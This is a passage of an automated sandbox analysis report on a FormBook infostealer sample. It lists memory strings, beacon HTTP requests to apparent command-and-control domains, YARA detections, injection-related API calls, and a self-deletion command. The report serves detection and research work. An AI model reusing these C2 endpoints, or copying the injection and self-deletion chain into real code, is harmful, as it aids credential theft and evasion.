            Source: control.exe, 0000000D.00000002.623085795.0000000005222000.00000004.00020000.sdmpString found in binary or memory: http://www.vintagepaseo.com/Work_from_Home.cfm?fp=DaDrTtodEbKG7H0GzLA3PtWLrM%2BdgeVzyxLURkW8zfJIpKi%
            Source: control.exe, 0000000D.00000002.623085795.0000000005222000.00000004.00020000.sdmpString found in binary or memory: http://www.vintagepaseo.com/__media__/design/underconstructionnotice.php?d=vintagepaseo.com
            Source: control.exe, 0000000D.00000002.623085795.0000000005222000.00000004.00020000.sdmpString found in binary or memory: http://www.vintagepaseo.com/__media__/js/trademark.php?d=vintagepaseo.com&type=ns
            Source: control.exe, 0000000D.00000002.623085795.0000000005222000.00000004.00020000.sdmpString found in binary or memory: http://www.vintagepaseo.com/display.cfm
            Source: control.exe, 0000000D.00000002.623085795.0000000005222000.00000004.00020000.sdmpString found in binary or memory: http://www.vintagepaseo.com/mexq/?e66HNDO=NdiAijP1TUDTbxv
            Source: iAuPyHuUkk.exe, 00000000.00000002.374306754.0000000007632000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
            Source: iAuPyHuUkk.exe, 00000000.00000003.355148904.0000000006366000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cnava
            Source: control.exe, 0000000D.00000002.623085795.0000000005222000.00000004.00020000.sdmpString found in binary or memory: https://hm.baidu.com/hm.js?8518669f0d31e41508be0babf5a8fc28
            Source: control.exe, 0000000D.00000002.623085795.0000000005222000.00000004.00020000.sdmpString found in binary or memory: https://zz.bdstatic.com/linksubmit/push.js
            Source: unknownDNS traffic detected: queries for: www.iphone13promax.design
            Source: global trafficHTTP traffic detected: GET /mexq/?e66HNDO=NdiAijP1TUDTbxv+UVf96WWBcfe2HF0RhGf6TXdRPwqQZT7SHaZsoP4NORlVjEEjxsHi13Lz5g==&6lux=TrTPmvux5 HTTP/1.1Host: www.vintagepaseo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /mexq/?e66HNDO=aPMuX7G1Ot9XJXghMAabXwwkzBWzprGcmmQ5cfrgMP5E/C43hf1Uz5bqYekFv+cUss1JtU0p5g==&6lux=TrTPmvux5 HTTP/1.1Host: www.xn--aprendes-espaol-brb.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /mexq/?e66HNDO=g6L0/Z2eA1jwRGo1l6rXBhzWGtzMcF3Ol1vrZIbNMV/6CHuR9YyStXwolwULrpYmw34wy4pkGQ==&6lux=TrTPmvux5 HTTP/1.1Host: www.cyebang.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

            E-Banking Fraud:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 3.2.iAuPyHuUkk.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.iAuPyHuUkk.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.iAuPyHuUkk.exe.45ef360.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000D.00000002.619163959.0000000002FE0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.455602320.0000000001930000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.619272890.0000000003010000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.454131267.00000000015D0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.371245810.00000000043C9000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000000.400507122.00000000075B9000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000000.421546178.00000000075B9000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.617454019.00000000009B0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.453689507.0000000000400000.00000040.00000001.sdmp, type: MEMORY

            System Summary:

            barindex
            Malicious sample detected (through community Yara rule)Show sources
            Source: 3.2.iAuPyHuUkk.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 3.2.iAuPyHuUkk.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 3.2.iAuPyHuUkk.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 3.2.iAuPyHuUkk.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0.2.iAuPyHuUkk.exe.45ef360.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0.2.iAuPyHuUkk.exe.45ef360.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0000000D.00000002.619163959.0000000002FE0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0000000D.00000002.619163959.0000000002FE0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000003.00000002.455602320.0000000001930000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000003.00000002.455602320.0000000001930000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0000000D.00000002.619272890.0000000003010000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0000000D.00000002.619272890.0000000003010000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000003.00000002.454131267.00000000015D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000003.00000002.454131267.00000000015D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000000.00000002.371245810.00000000043C9000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000000.00000002.371245810.00000000043C9000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000005.00000000.400507122.00000000075B9000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000005.00000000.400507122.00000000075B9000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000005.00000000.421546178.00000000075B9000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000005.00000000.421546178.00000000075B9000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0000000D.00000002.617454019.00000000009B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0000000D.00000002.617454019.00000000009B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000003.00000002.453689507.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000003.00000002.453689507.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: iAuPyHuUkk.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
            Source: 3.2.iAuPyHuUkk.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 3.2.iAuPyHuUkk.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 3.2.iAuPyHuUkk.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 3.2.iAuPyHuUkk.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0.2.iAuPyHuUkk.exe.45ef360.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0.2.iAuPyHuUkk.exe.45ef360.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0000000D.00000002.619163959.0000000002FE0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0000000D.00000002.619163959.0000000002FE0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000003.00000002.455602320.0000000001930000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000003.00000002.455602320.0000000001930000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0000000D.00000002.619272890.0000000003010000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0000000D.00000002.619272890.0000000003010000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000003.00000002.454131267.00000000015D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000003.00000002.454131267.00000000015D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000000.00000002.371245810.00000000043C9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000000.00000002.371245810.00000000043C9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000005.00000000.400507122.00000000075B9000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000000.400507122.00000000075B9000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000005.00000000.421546178.00000000075B9000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000000.421546178.00000000075B9000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0000000D.00000002.617454019.00000000009B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0000000D.00000002.617454019.00000000009B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000003.00000002.453689507.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000003.00000002.453689507.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeCode function: 0_2_01A4D0640_2_01A4D064
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeCode function: 0_2_01A4F2880_2_01A4F288
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeCode function: 0_2_01A4F2980_2_01A4F298
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeCode function: 3_2_004010303_2_00401030
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeCode function: 3_2_0041C9C73_2_0041C9C7
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeCode function: 3_2_0041D1BF3_2_0041D1BF
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeCode function: 3_2_0041BA6C3_2_0041BA6C
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeCode function: 3_2_0041C2A53_2_0041C2A5
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeCode function: 3_2_00408C903_2_00408C90
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeCode function: 3_2_00402D873_2_00402D87
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeCode function: 3_2_00402D903_2_00402D90
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeCode function: 3_2_0041C7E13_2_0041C7E1
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeCode function: 3_2_00402FB03_2_00402FB0
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BAB09013_2_04BAB090
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BA841F13_2_04BA841F
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C5100213_2_04C51002
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04C61D5513_2_04C61D55
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04B90D2013_2_04B90D20
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BB412013_2_04BB4120
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04B9F90013_2_04B9F900
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BB6E3013_2_04BB6E30
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BCEBB013_2_04BCEBB0
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_009CD1BF13_2_009CD1BF
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_009CC9C713_2_009CC9C7
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_009B8C9013_2_009B8C90
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_009B2D9013_2_009B2D90
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_009B2D8713_2_009B2D87
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_009B2FB013_2_009B2FB0
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeCode function: 3_2_004185F0 NtCreateFile,3_2_004185F0
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeCode function: 3_2_004186A0 NtReadFile,3_2_004186A0
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeCode function: 3_2_00418720 NtClose,3_2_00418720
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeCode function: 3_2_004187D0 NtAllocateVirtualMemory,3_2_004187D0
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeCode function: 3_2_004185EB NtCreateFile,3_2_004185EB
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeCode function: 3_2_0041869A NtReadFile,3_2_0041869A
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeCode function: 3_2_0041871C NtClose,3_2_0041871C
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeCode function: 3_2_004187CA NtAllocateVirtualMemory,3_2_004187CA
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BD9860 NtQuerySystemInformation,LdrInitializeThunk,13_2_04BD9860
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BD9840 NtDelayExecution,LdrInitializeThunk,13_2_04BD9840
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BD99A0 NtCreateSection,LdrInitializeThunk,13_2_04BD99A0
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BD95D0 NtClose,LdrInitializeThunk,13_2_04BD95D0
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BD9910 NtAdjustPrivilegesToken,LdrInitializeThunk,13_2_04BD9910
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BD9540 NtReadFile,LdrInitializeThunk,13_2_04BD9540
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BD96E0 NtFreeVirtualMemory,LdrInitializeThunk,13_2_04BD96E0
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BD96D0 NtCreateKey,LdrInitializeThunk,13_2_04BD96D0
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BD9660 NtAllocateVirtualMemory,LdrInitializeThunk,13_2_04BD9660
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BD9650 NtQueryValueKey,LdrInitializeThunk,13_2_04BD9650
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BD9A50 NtCreateFile,LdrInitializeThunk,13_2_04BD9A50
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BD9780 NtMapViewOfSection,LdrInitializeThunk,13_2_04BD9780
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BD9FE0 NtCreateMutant,LdrInitializeThunk,13_2_04BD9FE0
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BD9710 NtQueryInformationToken,LdrInitializeThunk,13_2_04BD9710
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BD98A0 NtWriteVirtualMemory,13_2_04BD98A0
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BD98F0 NtReadVirtualMemory,13_2_04BD98F0
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BD9820 NtEnumerateKey,13_2_04BD9820
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BDB040 NtSuspendThread,13_2_04BDB040
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BD95F0 NtQueryInformationFile,13_2_04BD95F0
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BD99D0 NtCreateProcessEx,13_2_04BD99D0
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BDAD30 NtSetContextThread,13_2_04BDAD30
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BD9520 NtWaitForSingleObject,13_2_04BD9520
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BD9560 NtWriteFile,13_2_04BD9560
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BD9950 NtQueueApcThread,13_2_04BD9950
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BD9A80 NtOpenDirectoryObject,13_2_04BD9A80
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BD9A20 NtResumeThread,13_2_04BD9A20
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BD9610 NtEnumerateValueKey,13_2_04BD9610
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BD9A10 NtQuerySection,13_2_04BD9A10
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BD9A00 NtProtectVirtualMemory,13_2_04BD9A00
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BD9670 NtQueryInformationProcess,13_2_04BD9670
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BDA3B0 NtGetContextThread,13_2_04BDA3B0
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BD97A0 NtUnmapViewOfSection,13_2_04BD97A0
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BD9730 NtQueryVirtualMemory,13_2_04BD9730
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BDA710 NtOpenProcessToken,13_2_04BDA710
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BD9B00 NtSetValueKey,13_2_04BD9B00
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BD9770 NtSetInformationFile,13_2_04BD9770
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BDA770 NtOpenThread,13_2_04BDA770
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_04BD9760 NtOpenProcess,13_2_04BD9760
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_009C85F0 NtCreateFile,13_2_009C85F0
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_009C86A0 NtReadFile,13_2_009C86A0
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_009C87D0 NtAllocateVirtualMemory,13_2_009C87D0
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_009C8720 NtClose,13_2_009C8720
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_009C85EB NtCreateFile,13_2_009C85EB
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_009C869A NtReadFile,13_2_009C869A
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_009C87CA NtAllocateVirtualMemory,13_2_009C87CA
            Source: C:\Windows\SysWOW64\control.exeCode function: 13_2_009C871C NtClose,13_2_009C871C
            Source: iAuPyHuUkk.exeBinary or memory string: OriginalFilename vs iAuPyHuUkk.exe
            Source: iAuPyHuUkk.exe, 00000000.00000000.348390007.0000000000F02000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameDictionaryEnumerat.exe6 vs iAuPyHuUkk.exe
            Source: iAuPyHuUkk.exe, 00000000.00000002.375787756.0000000008280000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameUI.dll< vs iAuPyHuUkk.exe
            Source: iAuPyHuUkk.exeBinary or memory string: OriginalFilename vs iAuPyHuUkk.exe
            Source: iAuPyHuUkk.exe, 00000003.00000000.367675277.0000000000BC2000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameDictionaryEnumerat.exe6 vs iAuPyHuUkk.exe
            Source: iAuPyHuUkk.exe, 00000003.00000002.454469053.000000000171F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs iAuPyHuUkk.exe
            Source: iAuPyHuUkk.exe, 00000003.00000002.456333138.0000000003635000.00000040.00020000.sdmpBinary or memory string: OriginalFilenameCONTROL.EXEj% vs iAuPyHuUkk.exe
            Source: iAuPyHuUkk.exeBinary or memory string: OriginalFilenameDictionaryEnumerat.exe6 vs iAuPyHuUkk.exe
            Source: iAuPyHuUkk.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: iAuPyHuUkk.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: iAuPyHuUkk.exeReversingLabs: Detection: 15%
            Source: iAuPyHuUkk.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\iAuPyHuUkk.exe 'C:\Users\user\Desktop\iAuPyHuUkk.exe'
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeProcess created: C:\Users\user\Desktop\iAuPyHuUkk.exe C:\Users\user\Desktop\iAuPyHuUkk.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\autofmt.exe C:\Windows\SysWOW64\autofmt.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exe
            Source: C:\Windows\SysWOW64\control.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\iAuPyHuUkk.exe'
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeProcess created: C:\Users\user\Desktop\iAuPyHuUkk.exe C:\Users\user\Desktop\iAuPyHuUkk.exeJump to behavior
            Source: C:\Windows\SysWOW64\control.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\iAuPyHuUkk.exe'Jump to behavior
            Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32Jump to behavior
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeFile created: C:\Users\user\AppData\Local\GottschalksJump to behavior
            Source: classification engineClassification label: mal100.troj.evad.winEXE@8/1@8/3
            Source: C:\Users\user\Desktop\iAuPyHuUkk.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5900:120:WilError_01
            Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
